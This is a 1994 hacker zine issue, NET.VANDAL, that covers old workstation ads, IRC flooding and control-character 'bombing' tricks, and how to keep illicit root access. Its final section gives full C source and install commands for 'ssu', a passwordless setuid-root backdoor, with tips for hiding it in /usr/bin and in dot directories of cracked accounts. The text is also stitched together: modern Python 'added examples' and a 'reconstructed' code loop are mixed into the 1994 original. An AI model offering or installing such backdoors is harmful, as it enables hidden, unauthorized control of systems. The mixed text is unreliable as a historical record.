\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
*VOL:1*   NUMBER 2, Oct. 29, 1994   ALL WRONGS DESERVED   TORONTO
///////////////////////////////////////////////////////////////////
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL//
\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\
///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL//
\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\
///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL//
\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\
///////////////////////////////////////////////////////////////////
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
///// An Exercise in Irritainment and Technological Pranking /////
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

NET.VANDAL vol 1, number 2
\\\\\\\\\\\\\\\\\\\\\\\\\\

Brought to you by: The Most Reverend Lucifer Messiah

CONTENTS  ontent  nten ..

* F E A T U R E *
  Where Have We Been? - The Most Reverend Father Looks at the Last 10 Years
  In Computing.

* G O S S I P - R U M O U R - F E E D B A C K *
  Spelling Bees, Heroics, IRC tricks

* C A B A L  T R I C K S *
  More cool IRC tricks - Channel Bombing and Flooding

* S P O R T S *
  Identity Crisis - Securing Illicit Root Accesses

        "I have nightmares when I'm asleep, too."

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

* F E A T U R E *

Where Have We Been? - The Most Reverend Father Looks at the Last 10 Years
In Computing.

I keep copies of all the computer magazines I've ever bought or received by
subscription. Trying really hard not to date myself, I came across a copy of
the August 1985 issue of CAD/CAM & Robotics [1] magazine, which immediately
caught my attention. The original idea behind this article was to poke a
laughing finger at technology while musing at how far we have come.
I was in for a rude awakening, which has changed my view entirely. The title
of this column was originally intended to invoke a somewhat nostalgic air in
the reader. Now I am shrugging my shoulders, looking at my PC, and saying,
"My gawd, where have we been?"

The advertisement on the inner cover really got me distressed. In it is
pictured a wire-frame drawing of something, god knows what, displayed on what
had to be nothing less than Super-VGA graphics, on a computer with a
base-footprint about the same size around as most desktop cases but half the
height, with one 5 1/4 inch floppy drive, a mouse, and the most wicked
looking keyboard I've ever seen. First off, in 1985 we were stuck with CGA
graphics, not this incredibly fine-detailed stuff. So I read the
advertisement. Here is how it went:

---
From the experts in interactive graphics - The Professional's Workstation

The InterPro 32 from Intergraph... the multi-tasking, multi-functional
workstation for today's professional

A personal computing resource

Powerful processors - including the 32-bit NSC 32032 - and extensive memory
equip the InterPro 32 as a standalone computing resource under UNIX System V
and PC-DOS. With no hidden processor under your desk.

A distributed processing resource

For access to distributed corporate computing resources, we built the
InterPro 32 with industry-standard networking - Intergraph's ISO 802.3
(Ethernet) architecture - and terminal emulation - the InterPro 32 serves as
an Intergraph graphics workstation linked to a VAX or MicroVAX, a VT100 and
VT220, Tektronix 4105, and (via a gateway) IBM 327x.

Plus interactive color graphics

Even more, the InterPro 32 features high-resolution, interactive color
graphics... graphics backed by Intergraph's years of technological
leadership. With a palette of 4096 for the image clarity and impact that only
color can give.

The InterPro 32 - a multi-functional professional workstation.

INTERGRAPH
Intergraph Systems Ltd
[address, etc] [2]
---

Honestly!
This is not a circa-1993 IBM advertisement! This ad is 9 years old.

Now, in 1985, I thought I had a pretty hot machine. In fact, most of my
friends thought I had a pretty hot machine. It was a brand new 8086 XT,
blazing at 4.77 Mega-hurts (they hadn't reached 8 MHz yet), and running a
CGA, which was the newest in graphics crazes. And it ran PC-DOS. The case was
absolutely humongous, and weighed more than I care to guesstimate. It also
had a single floppy drive, and a massive 20 Megabyte hard drive. I was often
caught laughing at the fact that a lot of major companies were still using
the 3M CBC System (Communicate By Card).

What is this system? Same year, same operating system, but with a 32-bit
processor, multitasking, 4096 colours on the graphics (CGA shows 4 at a
time), and all those other options and buzzwords that have only just hit us
IBM'ers recently? In fact, curiosity forced me to go through the magazine
page by page, ad by ad, to figure out what the resolution of that monitor
actually was. One possible answer was on the last page. Tektronix had a
monitor, 4096 colours. The resolution: 1280x1024 at 60Hz, non-interlaced!

WHAT????

Folks... there is something seriously wrong with this iNTEL thing.

We thought we had problems when Microsoft got in caca for infringing Stac
Electronics' patents with DoubleSpace, so they had to change things and pull
the disk compressor out of DOS. Because of this, the change from DOS 6.00
through to 6.2x was a DOWNgrade. Hardly progress.

We thought we had problems when iNTEL released the 80286. The new options in
this machine were so unpopular that iNTEL quickly released the 80386, saying
that it was what they were trying to do in the first place. The 80286? Try
selling one nowadays. Hardly progress indeed! The 80386 sounds not too much
more advanced than the 32032 machine mentioned in the ad. Why did it take
this long for iNTEL to catch up? In fact, it took about this long for
graphics resolutions like the monitor in the ad to appear for it.
Then iNTEL released the 80486. To this day, there is no software that
requires an 80486+ machine. The only benefit seems to be in speed. It was an
advancement, just not very much.

And the Pentium is a very hot chip indeed, in more ways than one. Prone to
overheating, and just as expensive as a lower-end mini-mainframe. The only
thing it does seem to add to the market is yet more speed, because the new
opcode list doesn't really show much of an improvement. CPUID is virtually
useless, unless you expect that you want to keep upgrading with iNTEL beyond
the Pentium. Since no software demands a minimum of a 486 yet, I doubt that
there will be one that will require a Pentium.

But the Pentium really was a step in the right direction. It has 64-bit
buses, a humongous prefetch queue, a killer internal code bus, and lots of
other hardware enhancements well beyond the 80486, and above the 32032
mentioned in the ad above. In hardware detail, the system is excellent. But
then again, this is now 9 years after the 32032. It is still a curious fact
that the 80x86 series took 9 years to break Intergraph's 32-bit barrier. I'd
be more inclined to buy the mini-mainframe.

Unfortunately, I don't know what the most recent descendant of the 32032 is.
But I have a feeling it is a whole new article unto itself.

[1] Published by Kerrwil Publications. Unknown if it still exists.
[2] Editor promises to never quote an entire advertisement again.

//////////////////////////////////////////////////////////////////////////////

* G O S S I P - R U M O U R - F E E D B A C K *

Gads. Someone told me that my spelling sucks, and suggests that I do
something about it. Considering Linux has 2 spell checkers online, I'm not
sure why I haven't bothered to ever use them. So look forward to better
spelling, I gess.

To the dude who forged a letter just to ask me if I thought I was some kind
of hero: as a matter of fact, I _do_ think I'm better than other people.
My psychiatrist assures me that I have an admirable contact with reality. I
mean, I would never say that I'm better than I really am. That would be
impossible anyway. [I'm still trying to figure out why you said that. Your
mother has always delighted in telling new navy recruits and submissive
Bay-streeters how stupid you are, so you're obviously not trying to prove
anything.]

Sharkboy, thanks for the encouragement, and comments on my IRC article. This
issue's CABAL TRICKS should keep you busy. There is a good chance that we
will publish a few more IRC columns in the future.

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

* C A B A L  T R I C K S *

More cool IRC tricks - Channel Bombing and Flooding

When one considers the vast number of machines being synchronized with each
other to carry the load of a chat system as large and as far-reaching as the
Internet Relay Chat, it is a marvel that things do not become more spasmodic
and erratic than they already do. The object of this issue's Cabal Tricks is
to present a few ideas, and to demonstrate ways in which irc can be pushed
into a state of chaos.

Flooding:
--------

Anyone who has ever used irc is well acquainted with the occasional lag, and
the continuous net splits. Both of these are symptoms of a server becoming
more and more out of sync with the others on the net. Lagging is caused by a
certain degree of out-of-sync'edness. Lags are virtually harmless, but
terribly annoying, since messages take so long to get to and from users on
that server. A net split occurs when a server is so far behind that the link
between it and its neighbours is dropped, and the two sides have to
resynchronize with each other. This resetting action occurs in response to
two conditions. The first is outlined above; the second is when too much
information is forced through for the server to process. When this happens,
it is called flooding. On many sites, piping in a large text file is enough
to cause a flood.
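Here is what the server side of that looks like, as an added example for this column (it is not the zine's script and not any ircd's real source). It is a toy model of the per-client flood control an ircd of that era applied: every parsed command adds a penalty to the client's clock, the server stops reading from a client whose clock runs too far ahead of real time, and a client whose unread input piles up past a limit is dropped with "Excess Flood". The constants, the nick and channel names, and the wire lengths are illustrative assumptions. It models both the crude piped-file flood and the '/ping *' command a reader suggested, which comes up further on in this column.

```python
"""Toy model of per-client flood control in an ircd of the 2.8 era.

Added example for this column, not the zine's script and not any server's
real source. Assumed (simplified) rules: every command the server parses adds
a penalty to the client's `since` clock ("fake lag"); once that clock runs
more than MAX_FAKE_LAG seconds ahead of real time the server stops reading
from the client; a client whose unread input exceeds RECVQ_LIMIT bytes is
dropped with "Excess Flood". All constants are illustrative.
"""

PENALTY_PER_COMMAND = 2        # seconds added to `since` for each command parsed
BYTES_PER_EXTRA_SECOND = 120   # one more second for every 120 bytes of text
MAX_FAKE_LAG = 10              # stop parsing once since > now + MAX_FAKE_LAG
RECVQ_LIMIT = 8000             # bytes of unparsed input tolerated per client


class Client:
    def __init__(self, nick):
        self.nick = nick
        self.since = 0.0       # virtual clock that penalties push forward
        self.recvq = []        # lines received but not yet parsed
        self.dead = False      # set when the server drops the connection
        self.parsed = 0        # commands executed so far

    def queued_bytes(self):
        return sum(len(line) for line in self.recvq)


def deliver(client, now, lines=()):
    """Hand `lines` from `client` to the server at time `now` and parse as
    many as the penalty budget allows. Returns the number parsed this call."""
    client.recvq.extend(lines)
    if client.since < now:     # idle time lets an old penalty expire
        client.since = now
    parsed = 0
    while client.recvq and client.since - now <= MAX_FAKE_LAG:
        line = client.recvq.pop(0)
        client.since += PENALTY_PER_COMMAND + len(line) // BYTES_PER_EXTRA_SECOND
        parsed += 1
    if client.queued_bytes() > RECVQ_LIMIT:
        client.dead = True     # "Excess Flood": the flooder is the one cut off
    client.parsed += parsed
    return parsed


def pipe_text_file(line_count=300, line_length=70):
    """The crude flood: a text file piped into the channel in one go.
    Returns (commands parsed before throttling, was the client dropped?)."""
    me = Client("flooder")
    # constructed input: 300 lines of filler, 85 bytes each on the wire
    lines = ["PRIVMSG #chan :" + "x" * line_length] * line_count
    parsed = deliver(me, now=0, lines=lines)
    return parsed, me.dead


def ping_star(member_count=40, repeats=3):
    """The reader's trick: in ircII '*' is the current channel, so '/ping *'
    is one CTCP PING to the channel, and every client in it answers with a
    NOTICE. Returns (sender dropped?, replies the server relayed, fake lag in
    seconds sitting on every member at the end)."""
    me = Client("pinger")
    members = [Client("user%d" % i) for i in range(member_count)]
    replies = 0
    now = 0
    for _ in range(repeats):           # typed several times, a second apart
        deliver(me, now, ["PRIVMSG #chan :\x01PING 1\x01"])
        for m in members:              # each auto-reply is a command too, so
            replies += deliver(m, now, ["NOTICE %s :\x01PING 1\x01" % me.nick])
        now += 1
    return me.dead, replies, members[0].since - now


if __name__ == "__main__":
    print("piping a file:", pipe_text_file())                  # (6, True)
    print("/ping * x3 in a 40-user channel:", ping_star())     # (False, 120, 3.0)
```

The piped file parses six lines before the budget runs out and the rest sits in the receive queue until the server cuts the flooder off, which is exactly why the crude flood tends to reset you first. The single CTCP PING to the channel costs the sender one command but makes forty clients each spend a command answering, so the whole channel accrues lag while nobody trips the queue limit.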
Although it works, it isn't very creative. As well, on the sites where it
doesn't work, flood detection will usually reset the source of the flood
first (that source being you). There are many more interesting ways to do
it, which will not set off the flood detection on your end but will usually
knock off the other people. Even if it doesn't, you can delight in watching
them fume about system speed problems or annoying screen activity.

The included script contains the following flood commands, plus several more:

/tsunami    The original tsunami flood that all the irc MOTDs warn you
            against.
/sedflood   Floods a user with [ENCRYPTED MESSAGE] tokens.

A NET.VANDAL reader also suggested a simple command which seems to slow down
the channel incredibly if there are lots of people using it. The command is:

/ping *

It is especially effective if executed several times one right after the
other. It manages to avoid flooding, but there is a noticeable choppiness
(lag) with irc in that channel. (What makes it work is that '*' is the
current channel, so you send a single CTCP PING while every client in the
channel answers it with a NOTICE; the server has to relay one reply per
member each time you type the command.)

Bombing:
-------

In my never-too-humble opinion, bombing is much more interesting than
flooding, in any regard. Because of their nature, often not everyone on the
channel is affected by channel bombing. It is still interesting to watch
when half the channel start bitching and logging off en masse, while the
other half sits there wondering what happened.

I would like to thank Vassago for Gargoyle, which was heavily relied upon to
make this script. And to TSP, a 13 year old pseudo-hacker who easily proves
that when Anton LaVey said, "There is no mind more genuinely evil than that
of a child", he wasn't kidding, for bringing me these irc scripts and a few
new ideas.

The bomb abuses the fact that channel keys can contain control characters.
That is to say, characters created by pressing a key with the Ctrl key held
down as well. These characters usually appear as a bolded capital version of
the letter that you pressed, or as some other bolded symbol. For instance,
^B would look like a bright 'B'.
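The reason those control characters do anything at all is that the client copies the key straight to the terminal. As an added example (not the zine's script and not any IRC client's actual code), here is the filter a client would run every server-supplied string through so that the sequences behind the bombs in this column are displayed rather than executed. The ZMODEM trigger bytes are an assumption about what the DOS/Windows terminal programs of the day keyed on; the sample keys are constructed.

```python
"""Filter IRC text before it touches the terminal.

Added example, not the zine's script and not any IRC client's actual code.
The bombs described in this column work because an ircII-era client wrote
channel keys, topics and messages straight to the tty, so an ESC sequence
embedded in a key was executed by the terminal. A client that runs every
server-supplied string through a filter like this has nothing left to bomb.
The ZMODEM trigger string is an assumption about what DOS/Windows terminal
programs of the era keyed on.
"""
import re

# CSI sequences: ESC [ parameters intermediates final  (clear screen, colours,
# cursor movement, blink: the shapes behind /bblack and /bfire)
CSI_RE = re.compile(r"\x1b\[[0-?]*[ -/]*[@-~]")
# remaining two- or three-byte ESC sequences (ESC c = reset, ESC ( 0 = charset)
ESC_RE = re.compile(r"\x1b[()#%*+][0-~]|\x1b[0-~]")
# ZMODEM auto-start header "**<CAN>B00": assumed trigger for the /bsz bomb
ZRQINIT = "**\x18B00"
# IRC's own formatting codes are harmless to the terminal and are kept
KEEP = {"\t", "\x02", "\x03", "\x16", "\x1f"}   # tab, bold, colour, reverse, underline


def sanitize(text):
    """Return `text` with escape sequences and the ZMODEM trigger removed and
    any other control byte shown in caret notation (ESC -> ^[, BEL -> ^G)."""
    text = text.replace(ZRQINIT, "[zmodem-trigger]")
    text = CSI_RE.sub("", text)
    text = ESC_RE.sub("", text)
    out = []
    for ch in text:
        code = ord(ch)
        if (code < 0x20 and ch not in KEEP) or code == 0x7f:
            out.append("^" + chr((code + 0x40) & 0x7f))   # 0x1b -> ^[, 0x7f -> ^?
        else:
            out.append(ch)
    return "".join(out)


def is_hostile(text):
    """True when `text` carries anything the filter had to neutralize."""
    return sanitize(text) != text


def show_mode(line):
    """Render a raw 'MODE #chan +k <key>' line the way a filtering client
    would, so the key is seen but never executed by the terminal."""
    parts = line.split(" ", 3)       # MODE, channel, mode string, trailing args
    return " ".join(sanitize(p) for p in parts)


if __name__ == "__main__":
    # constructed sample keys, the shapes this column's bombs rely on
    samples = {
        "black": "\x1b[30;40m\x1b[2Jkey",
        "fire": "\x1b[5;31mFIRE!!!\x1b[0m",
        "reset+bell": "\x1bc\x07",
        "zmodem": "**\x18B00000000",
        "plain": "\x02bold\x02 \x0304red",
    }
    for name, key in samples.items():
        print("%-10s hostile=%-5s -> %r" % (name, is_hostile(key), sanitize(key)))
    print(show_mode("MODE #chan +k \x1b[2Jsecret"))
```

Note that the IRC bold, colour, reverse and underline bytes pass through untouched: they are interpreted by the client, never by the terminal, so they are not the problem. Everything else below 0x20 becomes a visible caret pair, which is how the "bright B" the text describes looks once a client stops trusting the server.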
Control characters in a key make it possible to create various annoying
escape sequences, which will be interpreted by the terminal as VT100 or ANSI
codes to do other things. The script included in the uuencoded file contains
several bombs. Here is a list of some of the bombs, and what they do:

/bdie       logs channel users off of irc
/bsz        constantly invokes auto-zmodem on DOS and Windoze users
/bblack     makes the screen turn black
/bfire      prints a blinking red FIRE!!! on the status bar

Here is the script. To use it, uudecode it (uuencoding it stops the control
characters from being altered while shipping NET.VANDAL). Then use gunzip to
uncompress trick.gz. When you are in irc, type:

/load tricks

After that, you may type /tricks to get a list of the irc tricks available.
There are a few undocumented tricks as well. (Hint: one of these undocumented
tricks is set off when someone tries to ping you.)

There is so much more that you can do with these. But I have only planted
the seed. Please, if you come up with any good ideas to follow this up with,
post them to the list by mailing to net.van...@hack.pcscav.com.

Enjoy.

--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip ---
--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip ---

//////////////////////////////////////////////////////////////////////////////

* S P O R T S *

Identity Crisis - Securing Illicit Root Accesses

Getting root access on a system is tough enough, but what about keeping that
access once you've gotten it? After you have successfully cracked root
access on a system, it is pretty well mandatory that you get in and out of
there as quickly as possible, to avoid detection by the system
administrator. The easiest way is to run as root from another account. There
are at least two good methods if you don't already have your own account on
the system. Either way, it is probably a good idea to NOT use your own
account if you do have one there.
The first one is to also crack a rarely-used account, or the account of
someone new to Unix. They usually won't notice any changes to their home
directory, and disregard the "Last login ..." message. Creating a directory
with a '.' as the first character will keep it invisible enough to the real
owner of the account. The following file names are rather good form:

~/.tinrc/.tinrc
~/.emacs/.temp

You can likely do your work in these directories without ever getting
caught, even if you store stuff there.

The second way is to set up your own account. (You have root, remember.) Use
whichever method at your own discretion. On a large system, this method is
probably best. On a smaller system, forget it. Use someone else's account.

From that account, you are free to run 'su' and login as root. This way,
'who' doesn't report that root is logged in somewhere that it shouldn't be.

This still leaves one problem. If the system administrator changes the root
password, which according to Murphy's Law he will, you are back where you
started from. This is where 'ssu' comes in.

'ssu' is a small program (compiled under Linux it is 9220 bytes) which is
installed setuid root and runs whatever program you name as root. The benefit
of this over 'su' is that it never asks for a password. If the root password
is ever changed, it won't matter. Running 'ssu bash' will give you a root
shell, but won't report it as such to anybody. Here is the output of 'w' as
reported to the user (in this case, cboyd):

---
bash# w
  8:12pm  up 127 days,  4:39,  2 users,  load average: 0.00, 0.01, 0.00
User     tty       from              login@  idle   JCPU   PCPU  what
root     tty1                        5:19pm  2                   -bash
cboyd    ttyS5                       7:42pm  -
bash#
bash# whoami
root
bash#
---

The fun is in the reply to the 'whoami' command. Oddly enough, 'who am i'
tells the truth, outputting this:

---
bash# who am i
cinema!cboyd     ttyS5    Oct 24 19:42
bash#
---

This is no cause for concern though. 'whoami' looks up the effective UID of
the process, which ssu has made 0, while 'who am i' only reads the utmp
record for your terminal, and that still carries the name that logged in on
it.
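The flip side, for whoever administers the box: ssu only works because the file carries the setuid bit and is owned by root, and that is a property of the file that no amount of hiding in utmp changes. As an added example (not part of the original zine), here is the audit an administrator runs to catch it: scan a tree for setuid files owned by a given uid and diff the result against a list recorded at install time. The directory layout, the baseline format and the throwaway tree that demo() builds are assumptions for illustration; demo() runs unprivileged, so "root" there is whoever runs it.

```python
"""Audit a tree for setuid executables and diff against a baseline.

Added example, not part of the original zine. This is the check an
administrator runs to catch an ssu planted in /usr/bin: the binary has to be
setuid root to work at all, and that bit is a property of the file, not of
who is logged in. Paths, the baseline format and the temporary tree built by
demo() are assumptions for illustration.
"""
import os
import stat
import tempfile


def find_setuid(root, owner_uid=0):
    """Sorted paths of regular files under `root` with the setuid bit set and
    owned by `owner_uid`. Symlinks are not followed, so a planted link cannot
    steer the scan away from the real binary."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                     # vanished or unreadable; carry on
            if (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID
                    and st.st_uid == owner_uid):
                found.append(path)
    return sorted(found)


def diff_baseline(current, baseline):
    """Compare a fresh scan with the list recorded at install time.
    Returns (newly setuid, no longer setuid)."""
    cur, base = set(current), set(baseline)
    return sorted(cur - base), sorted(base - cur)


def demo():
    """Self-contained run on a throwaway tree: a legitimate setuid 'passwd',
    an ordinary 'ls', and a planted 'ssu'. Returns what the diff reports,
    with paths relative to the tree root."""
    with tempfile.TemporaryDirectory() as tmp:
        bindir = os.path.join(tmp, "usr", "bin")
        os.makedirs(bindir)

        def plant(name, mode):
            path = os.path.join(bindir, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")       # placeholder body; the mode is what matters
            os.chmod(path, mode)
            return path

        legit = plant("passwd", 0o4755)      # setuid, and on the baseline
        plant("ls", 0o755)                   # not setuid at all
        plant("ssu", 0o4755)                 # setuid, and not on the baseline
        # unprivileged demo: "root" is whoever runs it, since only the owner
        # can set the bit on files it just created
        current = find_setuid(tmp, owner_uid=os.getuid())
        added, removed = diff_baseline(current, [legit])
        rel = lambda p: os.path.relpath(p, tmp).replace(os.sep, "/")
        return [rel(p) for p in added], [rel(p) for p in removed]


if __name__ == "__main__":
    added, removed = demo()
    print("new setuid files:", added)        # ['usr/bin/ssu']
    print("no longer setuid:", removed)      # []
```

Run against a real system the call is find_setuid("/") with the default owner_uid of 0, and the baseline is whatever the same scan returned right after installation; an innocuous name in a crowded /usr/bin does nothing against a diff. The same scan is what the one-liner 'find / -perm -4000 -user root' prints, but keeping the baseline is what turns a list into an alarm.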
Here is the output of 'w' as root sees it:

---
root:/tmp# w
  8:13pm  up 127 days,  4:40,  2 users,  load average: 0.00, 0.01, 0.00
User     tty       from              login@  idle   JCPU   PCPU  what
root     tty1                        5:19pm  1      1            -w
cboyd    ttyS5                       7:42pm  -
---

Even if root runs 'w -u cboyd', he will only see that you are running 'bash'.

Something else to keep in mind: the owner and group of the ssu binary
determine which user you will become, because the setuid bit hands out the
file owner's UID. Of course, our example makes you root, but I could very
easily have made it cboyd, and then hidden the file somewhere. Doing this
would give any user who executes ssu access to cboyd's home directory,
amongst other things.

Because of its innocuous sounding name, you could probably install the
program in the /usr/bin directory, which usually contains more executable
files than any other directory on the disk, without it ever being noticed.
This way, if you lose the account you were using, you can use another one
and still have the same access. (It is not invisible, though: anything that
lists setuid-root files, such as 'find / -perm -4000 -user root', will turn
it up right next to passwd and su.)

Remember to exit the 'su' shell as soon as you are done compiling and
installing 'ssu'. There is no need to add unnecessary risk to what you are
doing.

Here is the source code. Put the following into a file called ssu.c and
follow the instructions contained in the code. The body of the argument loop
was lost when this issue was posted; it is filled back in from context (glue
the arguments together and hand them to the shell), and the rest is as
printed.

--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip ---
/*****************************************************************************
  The Secret Super User
  ---------------------
  Brought to you by: The Most Reverend Father Lucifer Messiah

  USAGE:         ssu command [args ...]

  INSTALLATION:  Do the following as root or suid as root:

                 cc ssu.c -o ssu
                 strip ssu
                 chown root.bin ssu
                 chmod 4755 ssu
                 mv ssu /usr/bin
 *****************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

int main(int argc, char **argv)
{
    int gid, egid, uid, i;
    char execute[1000];
    size_t used = 0;

    gid = getgid();             /* caller's real gid, kept for reference */
    uid = geteuid();            /* root, because the binary is setuid root */
    setuid(uid);                /* make the real uid root too, so the child is root */
    egid = getegid();
    setregid(egid, egid);
    (void)gid;

    if (argc < 2) {
        fprintf(stderr, "usage: ssu command [args ...]\n");
        return 1;
    }

    /* Reconstructed from context (the original loop body did not survive
       posting): join the arguments into one command line and run it through
       the shell, refusing anything that would not fit the buffer. */
    execute[0] = '\0';
    for (i = 1; i < argc; i++) {
        size_t len = strlen(argv[i]);
        if (used + len + 2 > sizeof execute) {
            fprintf(stderr, "ssu: command line too long\n");
            return 1;
        }
        strcat(execute, argv[i]);
        strcat(execute, " ");
        used += len + 1;
    }
    return system(execute);
}
--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip ---

>>>>>>>>>> will appear whenever I get to it (good forgeries are welcomed)

How do I JOIN NET.VANDAL?
************************

Join the list at any time by sending a "SUBSCRIBE NET.VANDAL" command in the
body of a message to net.vandal-requ...@hack.pcscav.com

How do I LEAVE NET.VANDAL?
*************************

Leave the list at any time by sending an "UNSUBSCRIBE NET.VANDAL" command in
the body of a message to net.vandal-requ...@hack.pcscav.com

How do I SUBMIT INFO to NET.VANDAL?
**********************************

Send your articles addressed to net.van...@hack.pcscav.com

<<<<<<<<<<===NET.VANDAL===>>>>>>>>>>

--
The Most Reverend Father Lucifer Messiah     "If you act like a dumbshit,
Subscribe to NET.VANDAL                        they'll treat you as an equal"
Send "SUBSCRIBE" to:                                     - J.R. "Bob" Dobbs
net.van...@hack.pcscav.com

--- Internet Message Header Follows ---
Newsgroups: ont.general, tor.general, alt.net.scandal, alt.zines,
  alt.journalism, alt.insults.gangbang, can.general, alt.usenet.kooks,
  alt.activism, alt.2600, alt.news-media
From: luci...@csis.pcscav.com (Lucifer Messiah)
Subject: NET.VANDAL: VOLUME 1 ISSUE 2
Message-ID: <1994Oct29.071234.6...@csis.pcscav.com>
Organization: More like Disorganization
Date: Sat, 29 Oct 1994 07:12:34 GMT
X-Newsreader: TIN [version 1.2 PL2]
Lines: 553